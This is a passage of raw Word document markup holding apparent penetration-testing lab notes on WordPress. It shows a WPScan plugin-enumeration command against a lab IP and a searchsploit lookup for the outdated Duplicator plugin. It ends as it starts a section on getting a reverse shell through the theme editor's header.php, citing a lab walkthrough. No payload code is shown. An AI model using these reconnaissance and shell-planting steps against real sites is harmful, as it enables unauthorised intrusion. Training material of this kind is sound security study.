          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a WordPress vulnerability scanner. This tool attempts to determine the WordPress versions, themes, and plugins as well as their vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D42">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WPScan looks up component vulnerabilities in the</w:t>
      </w:r>
      <w:hyperlink r:id="rId956">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId957">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">WordPress Vulnerability Database</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which requires an API token. A limited API key can be obtained for free by registering an account on the WPScan homepage. However, even without providing an API key, WPScan is a great tool to enumerate WordPress instances.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D43">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To perform the scan without an API key, we'll provide the URL of the target for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--url</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, set the plugin detection to aggressive, and specify to enumerate all popular plugins by entering </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as an argument to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--enumerate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. In addition, we'll use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-o</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create an output file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D44">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan --url http://192.168.50.244 --enumerate p --plugins-detection aggressive -o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">websrv1/wpscan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D45">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This prints the output to a directory called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">websrv1/wpscan </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">but you can change that</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also remove the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--plugins-detection aggressive</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" but sometimes the aggressive flag helps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can remove the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-o websrv1/wpscan</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" if you don't need to save the output to a file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D48">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D49">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat websrv1/wpscan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D4A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D4B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4358856" cy="6405563"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="207" name="image205.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image205.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId958"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4358856" cy="6405563"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D4C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D4D">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This shows that WPScan discovered six active plugins in the target WordPress instance:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="789"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId959">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">akismet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="789"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId960">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">classic-editor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="789"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId961">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">contact-form-7</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D51">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="789"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId962">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">duplicator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="789"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId963">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">elementor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D53">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="789"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId964">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">wordpress-seo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D54">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output also states that the Duplicator plugin version is outdated (so we can try attacking it)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D55">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead of using WPScan's vulnerability database, let's use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find possible exploits for vulnerabilities in the installed plugins. For most of the identified plugins, WPScan provided us with the detected versions. Because most of the plugins are up to date and no version could be detected for akismet, let's start with Duplicator.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D56">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit duplicator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D57">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7nq953r1zwom" w:id="398"/>
      <w:bookmarkEnd w:id="398"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse shell with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Admin Privileges</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> using "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Editor</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">header.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D58">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D59">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId965">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ColdBoxEasy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PG Play) (</w:t>
      </w:r>
      <w:hyperlink r:id="rId966">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D5A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D5B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: it's possible that this revereshell only gets you into the www-data account, and not the admin. But, like in this writeup, it's a good foothold into the machine, and then you can privilege escalate to admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D5C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D5D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also go on google since there are a lot of resources for how to get reverse shell from WordPress (especially if you already on admin account):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D5E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="922"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId967">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.hackingarticles.in/wordpress-reverse-shell/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D5F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">appearance </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and then go to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">editor </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">theme editor</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
